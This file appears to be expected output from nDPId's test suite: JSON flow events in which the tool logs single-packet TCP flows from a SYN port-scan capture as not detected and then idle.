-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":383,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1087,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":521,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059281,"flow_last_seen":1278275059281,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1088,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":521,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059281,"flow_last_seen":1278275059281,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1088,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":401,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1087,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":401,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1087,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1679,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060951,"flow_last_seen":1278275060951,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1089,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1679,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060951,"flow_last_seen":1278275060951,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1089,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":550,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1088,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":550,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1088,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1748,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061055,"flow_last_seen":1278275061055,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1089,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1748,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061055,"flow_last_seen":1278275061055,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1089,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1629,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1090,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1629,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1090,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1712,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1090,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1712,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1090,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1521,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060746,"flow_last_seen":1278275060746,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":21571,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1521,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060746,"flow_last_seen":1278275060746,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":21571,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1137,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1091,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1137,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1091,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":946,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":27715,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":946,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":27715,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1602,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060850,"flow_last_seen":1278275060850,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":21571,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1602,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060850,"flow_last_seen":1278275060850,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":21571,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1930,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061312,"flow_last_seen":1278275061312,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1092,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1930,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061312,"flow_last_seen":1278275061312,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1092,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1210,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1091,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1210,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1091,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1009,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":27715,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1009,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":27715,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1992,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1092,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1992,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1092,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":896,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059852,"flow_last_seen":1278275059852,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1093,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":896,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059852,"flow_last_seen":1278275059852,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1093,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1646,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1094,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1646,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1094,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":959,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059961,"flow_last_seen":1278275059961,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1093,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":959,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059961,"flow_last_seen":1278275059961,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1093,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5190,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5190,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1725,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1094,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1725,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1094,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":278,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5190,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":278,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5190,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1095,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":598,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059411,"flow_last_seen":1278275059411,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1096,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":598,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059411,"flow_last_seen":1278275059411,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1096,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 